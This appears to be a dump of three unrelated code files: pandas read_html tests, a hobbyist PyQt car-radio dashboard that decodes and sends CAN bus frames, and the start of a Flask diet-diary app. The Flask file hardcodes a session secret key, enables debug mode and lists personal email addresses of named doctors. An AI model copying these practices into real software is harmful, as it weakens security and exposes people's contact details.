<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
expected = DataFrame(
[["a", "b"]],
columns=MultiIndex.from_tuples(
[("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
),
)
tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
@pytest.mark.filterwarnings(
"ignore:You provided Unicode markup but also provided a value for "
"from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
def __iter__(self):
# to fool `is_file_like`, should never end up here
assert False
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
StarlightUI.py
|
import sys
import can
import can.interfaces.slcan
import threading
import os
from os.path import abspath, dirname, join
from datetime import datetime, date
import time
from textwrap import wrap
from PyQt5 import QtCore, QtGui, QtQml
from PyQt5.QtWidgets import QApplication
from PyQt5.QtQml import QQmlApplicationEngine
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import QTimer
from PyQt5.QtQuick import QQuickView
from vars import *
def radioFunctions():
global rdsText, isSeeking, source, freq, stationMem, modType, radioBand, volume, radioPower, showAudioMenu, srcImage
if not radioPower:
rdsText = "Radio Off"
freq = ""
radioBand = ""
modType = ""
stationMem = ""
srcImage = "power_off.png"
else:
if source == "AUX":
rdsText = "Playing from AUX"
freq = ""
radioBand = ""
modType = ""
stationMem = ""
srcImage = "aux_cable.png"
elif source == "CD":
if discType == "Audio CD":
rdsText = "Track " + str(cdCurrentTrack) +" / " + str(trackAll)
freq = currentTrackTime
radioBand = discType
modType = ""
stationMem = ""
else:
rdsText = cdTrackDetails[1][:25]
freq = cdTrackDetails[0]
radioBand = discType
modType = ""
stationMem = currentTrackTime
elif source == "Radio":
srcImage = "radio.png"
elif source == "USB":
rdsText = usbTrackName[1][:25]
freq = usbTrackName[0]
radioBand = current_time_USB
modType = ""
srcImage = "usb.png"
stationMem = ""
if isLRBal or isRFBal or isBass or isTreble or isLoudness or isAutoVol or isEQPreset:
showAudioMenu = True
else:
showAudioMenu = False
def tripFunction():
global tripImage
if tripMode == 0:
tripImage = ["trip_gasstation.png", "trip_fuel.png", "trip_distance.png"]
if tripMode == 1:
tripImage = ["trip_fuel.png", "trip_gasstation.png","trip_distance.png"]
def canSend():
global menuItem
#Main Menu task (Fix shit code later)
msgList = can.Message(arbitration_id=0x09F, data=[0x30, 0x00, 0x0A], is_extended_id=False)
print (menuItem)
if menuItem == "List":
bus.send(msgList)
menuItem = "None"
#Send Audio Settings only if menu visible to cut overall delay
def sendAudioValues():
#Show Setting
engine.rootObjects()[0].setProperty('isBass', isBass)
engine.rootObjects()[0].setProperty('isTreble', isTreble)
engine.rootObjects()[0].setProperty('isLoudness', isLoudness)
engine.rootObjects()[0].setProperty('isAutoVol', isAutoVol)
engine.rootObjects()[0].setProperty('isRFBal', isRFBal)
engine.rootObjects()[0].setProperty('isLRBal', isLRBal)
engine.rootObjects()[0].setProperty('isEQPreset', isEQPreset)
#Send Value
engine.rootObjects()[0].setProperty('bassValue', bassValue)
engine.rootObjects()[0].setProperty('trebleValue', trebleValue)
engine.rootObjects()[0].setProperty('loudValue', loudValue)
engine.rootObjects()[0].setProperty('autoVolValue', autoVolValue)
engine.rootObjects()[0].setProperty('rfValue', rfValue)
engine.rootObjects()[0].setProperty('lrValue', lrValue)
engine.rootObjects()[0].setProperty('eqPresetValue', eqPresetValue)
def sendList():
engine.rootObjects()[0].setProperty('trackList', trackList)
engine.rootObjects()[0].setProperty('trackListSel', trackListSel)
def canRead():
#bus = can.Bus(interface='slcan', channel='COM10', receive_own_messages=True)
global bus
bus = can.ThreadSafeBus(interface='slcan', channel='COM4')
#Define stuff
global rdsText, isSeeking, source, freq, stationMem, modType, radioBand, volume, isVolumeChanging, isVolumeStillChanging, radioPower, isLRBal, isRFBal, isBass, isTreble, isLoudness, isAutoVol, isEQPreset
global lrValue, rfValue, bassValue, trebleValue, loudValue, autoVolValue, eqPresetValue
global trackAll, discType, srcImage, cdCurrentTrack, currentTrackTime, menuItem, showMainMenu, current_time_USB, theID, usbTrackName, cdTrackDetails, trackList, showList, trackListSel
global tripInfo, darkMode, tripMode
curr_timer = time.time()
frameNum = 0
usbName = ""
frameLen = 0
cdframeNum = 0
cdframeLen = 0
cdName = ""
bigList = ""
bigListSplit = ""
initialList = True
tripMode = 0
for msg in bus:
id = msg.arbitration_id
if id == 0x123:
message = msg.data
messageAsc = message.hex(" ")
print (messageAsc)
#This one gets the RDS text (if available) and displays it. PSA did us a solid and is sending it in ASCII. Thanks French Gods
if id == 677 and radioPower:
rdsbytearr = msg.data
if rdsbytearr == b'\x00\x00\x00\x00\x00\x00\x00\x00':
rdsText = "No RDS Available"
else:
rdsText = rdsbytearr.decode()
#This one is for the radio's Band Display (FM1,etc) and displaying if we are using MHz or KHz
elif id == 549 and radioPower:
radioStatusarr = msg.data
radioStatus = radioStatusarr.hex('#')
radioHex = radioStatusarr.hex()
scale = 16
bitNum = 8
radioSplit = radioStatus.split("#")
radioStr = [bin(int(n, 16))[2:].zfill(bitNum) for n in radioSplit]
if str(radioSplit[2]) == "10":
radioBand = "FM-1"
modType = "MHz"
elif str(radioSplit[2]) == "20":
radioBand = "FM-2"
modType = "MHz"
elif str(radioSplit[2]) == "40":
radioBand = "FM-AST"
modType = "MHz"
elif str(radioSplit[2]) == "50":
radioBand = "AM"
modType = "KHz"
freqHex = radioSplit[3] + radioSplit[4]
freq = int(freqHex, 16)
freq = (freq * 0.05) + 50
freq = "%.2f" % freq
memHex = radioSplit[1]
stationMemarr = list(str(memHex))
stationMem = stationMemarr[0]
#This one reads the Source frame and displays accordingly. Added BT and USB just so you don't have to
elif id == 357:
sourcearr = msg.data
sourceHex = sourcearr.hex('#')
sourceSplit = sourceHex.split("#")
if sourceSplit[2] == "10":
source = "Radio"
elif sourceSplit[2] == "20":
source = "CD"
elif sourceSplit[2] == "40":
source = "AUX"
elif sourceSplit[2] == "60":
source = "USB"
elif sourceSplit[2] == "70":
source = "Bluetooth"
if sourceSplit[0] == "40":
#Set if Power is off. Everything else is on
radioPower = False
elif sourceSplit[0] == "E0":
radioPower = True
#Add mute state
else:
radioPower = True
#Gets the volume frame, turns HEX to Binary, splits the first 3 bits that tell us if the volume is currently being changed and translates the rest to integer
elif id == 421:
volarr = msg.data
volHex = volarr.hex()
scale = 16
bitNum = 8
volStr = bin(int(volHex, scale))[2:].zfill(bitNum)
volume = int(volStr[3:], 2)
if volStr[:3] == "000":
isVolumeChanging = True
isVolumeStillChanging = True
curr_timer = time.time()
msgFCF = can.Message(arbitration_id=0x525, data=[0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], is_extended_id=False)
bus.send(msgFCF)
msgFCF = can.Message(arbitration_id=0x52E, data=[0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], is_extended_id=False)
bus.send(msgFCF)
msgFCF = can.Message(arbitration_id=0x52F, data=[0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], is_extended_id=False)
bus.send(msgFCF)
else:
isVolumeStillChanging = False
if (time.time() - curr_timer) >= 2:
isVolumeChanging = False
#This long-ass code handles the audio settings menu
elif id == 485:
scale = 16
bitNum = 8
soundSetarr = msg.data
soundSetHex = soundSetarr.hex("#")
splits = soundSetHex.split("#")
soundSetBin = [bin(int(n, 16))[2:].zfill(bitNum) for n in splits]
#Left-Right Balance
if soundSetBin[0][0] == "1":
isLRBal = True
else:
isLRBal = False
if soundSetBin[1][0] == "1":
isRFBal = True
else:
isRFBal = False
if soundSetBin[2][0] == "1":
isBass = True
else:
isBass = False
if soundSetBin[4][0] == "1":
isTreble = True
else:
isTreble = False
if soundSetBin[5][0] == "1":
isLoudness = True
else:
isLoudness = False
if soundSetBin[5][3] == "1":
isAutoVol = True
else:
isAutoVol = False
if soundSetBin[6][1] == "1":
isEQPreset = True
else:
isEQPreset = False
#Handle the values and send them over, regardless of menu visibility
lrValue = int(soundSetBin[0][1:], 2) - 63
rfValue = int(soundSetBin[1][1:], 2) - 63
bassValue = int(soundSetBin[2][1:], 2) - 63
trebleValue = int(soundSetBin[4][1:], 2) - 63
loudValue = int(soundSetBin[5][1])
autoVolValue = int(soundSetBin[5][5:])
#Set EQ text
eqBin = int(soundSetBin[6][3:], 2)
if eqBin == 3:
eqPresetValue = "None"
elif eqBin == 7:
eqPresetValue = "Classical"
elif eqBin == 11:
eqPresetValue = "Jazz-Blues"
elif eqBin == 15:
eqPresetValue = "Pop-Rock"
elif eqBin == 19:
eqPresetValue = "Vocal"
elif eqBin == 23:
eqPresetValue = "Techno"
elif id == 869:
cdPresenceInfo = (msg.data).hex("#")
cdPresenceSplit = cdPresenceInfo.split("#")
trackAll = int(cdPresenceSplit[0], 16)
if trackAll == 255:
cdCurrentTrack = "--"
if str(cdPresenceSplit[3]) == "01":
discType = "MP3 Disc"
srcImage = "cd_mp3.png"
else:
discType = "Audio CD"
srcImage = "cd_audio.png"
elif id == 933 and source == "CD":
cdTrackHex = (msg.data).hex("#")
cdTrackSplit = cdTrackHex.split("#")
cdCurrentTrack = int(cdTrackSplit[0], 16)
if cdCurrentTrack == 255:
cdCurrentTrack = "--"
currentTrackTime = str("{:02}".format(int(cdTrackSplit[3], 16))) + ":" + str("{:02}".format(int(cdTrackSplit[4], 16)))
if currentTrackTime == "255:127":
currentTrackTime = "--:--"
elif id == 0x3E5:
#Main Menu shit code stuff
message = (msg.data).hex("#")
messageSplit = message.split("#")
scale = 16
bitNum = 8
messageStr = [bin(int(n, 16))[2:].zfill(bitNum) for n in messageSplit]
#if messageStr[0][1] == "1":
#menuItem = "Menu"
#msgMenu = can.Message(arbitration_id=0xDF, data=[0x90, 0x00, 0x70], is_extended_id=False)
#task = bus.send_periodic(msgMenu, 0.1)
#task.start()
#showMainMenu = True
#elif messageStr[2][3] == "1" and menuItem == "Menu":
#menuItem = "None"
#task.stop()
#showMainMenu = False
if messageStr[1][3] == "1":
#Mode button will change trip for now
tripMode += 1
if tripMode == 3:
tripMode = 0
elif messageStr[2][5] == "1":
if darkMode:
darkMode = False
else:
darkMode = True
print (darkMode)
elif id == 0x0A4:
# This one gets the track name from the CD. Works with MP3s, no idea if it works with Audio CDs (tests show that normal CDs don't have track data)
message = msg.data
messageHex = (msg.data).hex("#")
messageSplit = messageHex.split("#")
if messageSplit[0] == "10":
cdframeNum = 0
cdName = ""
cdframeLen = int(messageSplit[1], 16)
nameClean = message[6:]
singleFrame = nameClean.decode('ISO-8859-1')
else:
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
cdframeNum = cdframeNum + 1
cdName = cdName + singleFrame
# Flow Control Frame
msgFCF = can.Message(arbitration_id=0x09F, data=[0x30, 0x00, 0x0A], is_extended_id=False)
bus.send(msgFCF)
if cdframeNum == 7:
#When the length of the variable is the same as what the radio declared at the start,
#push it into the Global and split is at the NULL character so we have artist and track name separate
cdTrackNameStr = cdName[20:]
cdTrackName = cdTrackNameStr.split("\x00")[0]
cdTrackArtStr = cdName[:20]
cdTrackArtist = cdTrackArtStr.split("\x00")[0]
cdTrackDetails = [cdTrackArtist, cdTrackName]
#Sleep for better results because the sleep aids the kid and the sun the cow (Greek stuff you don't know)
time.sleep(0.1)
elif id == 0x363:
message = (msg.data).hex("#")
messageSplit = message.split("#")
secondsForm = int(messageSplit[6], 16) / 4
current_time_USB = str("{:02}".format(int(messageSplit[7], 16))) + ":" + str("{:02}".format(int(secondsForm)))
elif id == 0x2E3:
# This one is the USB text frame. It contains the track and artist data. Not documented so it was hard to find and even harder to find the FCF for it
# It's a CAN-TP frame, starting with 10 (because it's a multiframe) followed by the length of the name and then 0x63 (no idea why but I'm dumb)
# This piece of shit code takes the frame, hexifies it and splits it so we get the text length from it. Then, it shaves the first 3 bytes off
# of the original frame and passes it to the "completed" name variable. The frames after the initial one only have one byte we don't need, the index one
# so we shave it off and store them to the final text string as well. I have no precaution whatsoever about frames being send in the wrong order, might implement later
message = msg.data
messageHex = (msg.data).hex("#")
messageSplit = messageHex.split("#")
# The radio sends a frame with data [10, 60]. This signals that it will start sending the new title. We identify that and reinitiallize all of our variables.
if messageSplit[0] == "01" and messageSplit[1] == "60":
frameNum = 0
usbName = ""
frameNum = frameNum + 1
if frameNum == 2:
frameLen = int(messageSplit[1], 16)
nameClean = message[3:]
singleFrame = nameClean.decode('ISO-8859-1')
else:
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
if not frameNum == 1:
usbName = usbName + singleFrame
#Send the Flow Control Frame over to the radio so it gives us the rest of the frames
msgFCF = can.Message(arbitration_id=351, data=[0x30, 0x00, 0x0A], is_extended_id=False)
bus.send(msgFCF)
if frameLen == (len(usbName) + 1):
#When the length of the variable is the same as what the radio declared at the start,
#push it into the Global and split is at the NULL character so we have artist and track name separate
usbTrackName = usbName.split("\x00")
time.sleep(0.1)
elif id == 0x125 and discType == "MP3 Disc":
# List Thing. Each title is 20 chars long. When 1st byte is 06, get the selected track
message = msg.data
messageHex = (msg.data).hex("#")
messageSplit = messageHex.split("#")
if messageSplit[0] == "05" and messageSplit[1] == "00":
showList = False
initialList = True
trackList = []
else:
showList = True
#If we have just opened it, initialize everything
if initialList:
trackList = []
trackListSel = [False, False, False, False]
trackListSel[1] = True
#this closes and opens the list
if messageSplit[0] == "05":
bigList = ""
#Waits for all the names to be loaded
if messageSplit[0] >= "21" and initialList:
trackList = [" ", "Loading...", " ", " "]
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
bigList += singleFrame
#This signals the final frame
if messageSplit[0] == "2c" and initialList:
trackList = []
bigListSplit = [bigList[i:i+20] for i in range(0, len(bigList), 20)]
initialList = False
#Split the track names so nulls get ded and create the track list
for x in bigListSplit:
temp = x.rsplit('\x00')
trackList.append(temp[0])
bigList = ""
else:
#Shit code stuff that handles what happens after the list is loaded and we try to scroll up or down
#Made in a completely unorthodox way but if it works, it works
if messageSplit[0] == "06" and messageSplit[1] == "98" and not initialList:
selection = int(messageSplit[4], 16)
trackListSel = [False, False, False, False]
trackListSel[selection] = True
if messageSplit[0] == "21":
if selection == 0:
trackList.pop(3)
else:
trackList.pop(0)
trackList.insert(selection, "Loading...")
bigList = ""
if messageSplit[0] >= "21" and not initialList:
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
bigList += singleFrame
if messageSplit[0] == "23" and not initialList:
trackList.pop(selection)
temp = bigList.rsplit('\x00')
trackList.insert(selection, temp[0])
if messageSplit[0] == "06" and messageSplit[1] == "90":
trackListSel = [False, False, False, False]
trackListSel[1] = True
trackList = [" ", discType, " ", " "]
initialList = True
msgFCF = can.Message(arbitration_id=0x11F, data=[0x30, 0x00, 0x0A], is_extended_id=False)
bus.send(msgFCF)
time.sleep(0.15)
elif id == 0x221 and tripMode == 0:
#Trip Time my dude
message = (msg.data).hex("#")
messageSplit = message.split("#")
litersPerHundoHex = messageSplit[1] + '' + messageSplit[2]
kmUntilDeadHex = messageSplit[3] + '' + messageSplit[4]
kmRestHex = messageSplit [5] + '' + messageSplit[6]
litersPerHundo = int(litersPerHundoHex, 16)
kmUntilDead = int(kmUntilDeadHex, 16)
kmRest = int(kmRestHex, 16)
#print ("Liters: " + str(litersPerHundo) + " Km Dead: " + str(kmUntilDead) + " Km Rest: " + str(kmRest))
tripInfo = [str(kmUntilDead), str(litersPerHundo/10), str(kmRest)]
elif id == 0x2A1 and tripMode == 1:
message = (msg.data).hex("#")
messageSplit = message.split("#")
litersPerHundoHex = messageSplit[3] + '' + messageSplit[4]
avSpeedHex = messageSplit[0]
milesTripHex = messageSplit[1] + '' + messageSplit[2]
litersPerHundo = int(litersPerHundoHex, 16)
avSpeed = int(avSpeedHex, 16)
milesTrip = int(milesTripHex, 16)
tripInfo = [str(avSpeed), str(litersPerHundo/10), str(avSpeed)]
elif id == 0x261 and tripMode == 2:
message = (msg.data).hex("#")
messageSplit = message.split("#")
litersPerHundoHex = messageSplit[3] + '' + messageSplit[4]
avSpeedHex = messageSplit[0]
milesTripHex = messageSplit[1] + '' + messageSplit[2]
litersPerHundo = int(litersPerHundoHex, 16)
avSpeed = int(avSpeedHex, 16)
milesTrip = int(milesTripHex, 16)
tripInfo = [str(avSpeed), str(litersPerHundo/10), str(avSpeed)]
application_path = (
sys._MEIPASS
if getattr(sys, "frozen", False)
else os.path.dirname(os.path.abspath(__file__))
)
def main():
global engine
app = QApplication(sys.argv)
engine = QQmlApplicationEngine()
# Get the path of the current directory, and then add the name
# of the QML file, to load it.
qmlFile = os.path.join(application_path, "dashUI.qml")
engine.load(QtCore.QUrl.fromLocalFile(qmlFile))
#The big OOF that need optimization. Sends all data to the QML file for it to display. Updates ever 50ms (yikes) so station seeking and volume looks smooth
#Start Reading Thread
#th = threading.Thread(target=canRead)
#th.start()
def update_display():
radioFunctions()
tripFunction()
engine.rootObjects()[0].setProperty('radioBand', radioBand)
engine.rootObjects()[0].setProperty('rdsText', rdsText)
engine.rootObjects()[0].setProperty('freq', freq)
engine.rootObjects()[0].setProperty('stationMem', stationMem)
engine.rootObjects()[0].setProperty('modType', modType)
engine.rootObjects()[0].setProperty('source', source)
engine.rootObjects()[0].setProperty('srcImage', srcImage)
engine.rootObjects()[0].setProperty('showMainMenu', showMainMenu)
engine.rootObjects()[0].setProperty('isListVisible', showList)
engine.rootObjects()[0].setProperty('tripInfo', tripInfo)
engine.rootObjects()[0].setProperty('darkMode', darkMode)
engine.rootObjects()[0].setProperty('tripImage', tripImage)
engine.rootObjects()[0].setProperty('isVolumeChanging', isVolumeChanging)
engine.rootObjects()[0].setProperty('showAudioMenu', showAudioMenu)
if isVolumeChanging:
engine.rootObjects()[0].setProperty('volume', volume)
if showAudioMenu:
sendAudioValues()
if showList:
sendList()
#Gets and updates the date and time every second from the Pi's local time because I'm lazy and don't want to implement a datetime function that talks to the BSI
def update_datetime():
today = date.today()
now = datetime.now()
current_time = now.strftime("%H:%M")
curr_date = today.strftime("%d/%m/%Y")
engine.rootObjects()[0].setProperty('time', current_time)
engine.rootObjects()[0].setProperty('date', curr_date)
#Timer for updating everything
timer = QTimer()
timer.setInterval(50) # msecs 1000 = 1 sec
timer.timeout.connect(update_display)
timer.start()
#Timer for updating date and time
timer2 = QTimer()
timer2.setInterval(1000)
timer2.timeout.connect(update_datetime)
timer2.start()
if not engine.rootObjects():
sys.exit(-1)
sys.exit(app.exec_())
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('Interrupted')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
__init__.py
|
import logging
import datetime
import codecs
import os
import sqlite3
import numpy as np
from sqlite3 import OperationalError
from copy import copy
from threading import Thread
import openpyxl
import pandas as pd
import xgboost as xgb
from threading import Thread
from flask import Flask, render_template, request, redirect, url_for, session
from flask import send_file, jsonify, after_this_request, make_response
from flask_bootstrap import Bootstrap
from flask_login import LoginManager, UserMixin, login_user, login_required
from flask_login import logout_user, current_user
from flask_mail import Mail, Message
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from openpyxl.styles import Font, PatternFill
from openpyxl.styles.borders import Border, Side
from werkzeug.security import generate_password_hash, check_password_hash
from wtforms import StringField, PasswordField, BooleanField, IntegerField, SelectField
from wtforms.validators import InputRequired, Length, Email, EqualTo
from wtforms.validators import ValidationError, NumberRange, DataRequired
app = Flask(__name__)
app.jinja_env.filters['zip'] = zip
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
app.config['SQLALCHEMY_DATABASE_URI'] = \
'sqlite:///diacompanion.db'
app.config['TESTING'] = False
app.config['DEBUG'] = True
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = ''
app.config['MAIL_PASSWORD'] = ''
app.config['MAIL_DEFAULT_SENDER'] = ('Еженедельник', '')
app.config['MAIL_MAX_EMAILS'] = None
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_ASCII_ATTACHMENTS'] = False
app.config['SESSION_COOKIE_SAMESITE'] = "Lax"
Bootstrap(app)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
mail = Mail(app)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
username1 = db.Column(db.String(80))
email = db.Column(db.String(80), unique=True)
password = db.Column(db.String(15))
BMI = db.Column(db.String(80))
doc = db.Column(db.String(80))
class LoginForm(FlaskForm):
username = StringField('Логин или email',
validators=[InputRequired(message='Необходимо \
заполнить это поле'),
Length(min=5,
max=80,
message='Необходимо минимум 5 \
символов')])
password = PasswordField('Пароль', validators=[InputRequired(message='\
Необходимо \
заполнить \
это \
поле'),
Length(min=5,
max=15,
message='Пароль \
должен \
быть от 5 \
до 15 \
символов')])
remember = BooleanField('Запомнить меня')
class RegisterForm(FlaskForm):
email = StringField('Email',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
Email(message='Неправильно введен \
email'),
Length(max=80)])
username = StringField('Логин',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
Length(min=5,
max=15,
message='Никнейм \
должен \
быть от 5 \
до 15 \
символов')])
username1 = StringField('ФИО пользователя',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
Length(min=5,
max=80,
message='Необходимо минимум 5 \
символов')])
password = PasswordField('Пароль',
validators=[InputRequired(message='Создайте \
ваш \
пароль'),
Length(min=5, max=15,
message='Пароль \
должен \
быть от \
5 до 15 \
символов')])
password1 = PasswordField('Подтвердите пароль',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
EqualTo(fieldname='password',
message='Пароли \
не совпадают')])
weight = IntegerField('Вес, в кг',
validators=[InputRequired(message='Необходимо \
заполнить это \
поле'),
NumberRange(min=0,
max=200,
message='Укажите свой \
реальный вес'),
DataRequired(message='Введите целое \
число')])
height = IntegerField('Рост, в см',
validators=[InputRequired(message='Необходимо \
заполнить это \
поле'),
NumberRange(min=0,
max=250,
message='Укажите свой \
реальный рост'),
DataRequired(message='Введите целое \
число')])
select = SelectField(u'Лечащий врач', choices=[('pvpopova@ya.ru',
'Попова П.В.'),
('aleksandra.tkachuk.1988@mail.comm',
'Ткачук А.С.'),
('yanabolotko@gmail.com',
'Болотько Я.А.'),
('aleksandra-dronova@yandex.ru',
'Дронова А.В.'),
('elenavasukova2@gmail.com',
'Васюкова Е.А.'),
('anopova.ann@gmail.com',
'Анопова А.Д.'),
('andreigerasimov2704@gmail.com',
'Герасимов А.С.'),
('tatarinova.maria@mail.ru',
'Татаринова М.В.'),
('anna.datsiuk@mail.ru',
'Дацюк А.М.')])
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user is not None:
raise ValidationError('Имя пользователя занято')
def validate_email(self, email):
email = User.query.filter_by(email=email.data).first()
if email is not None:
raise ValidationError('Email уже использовался')
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.route('/')
def zero():
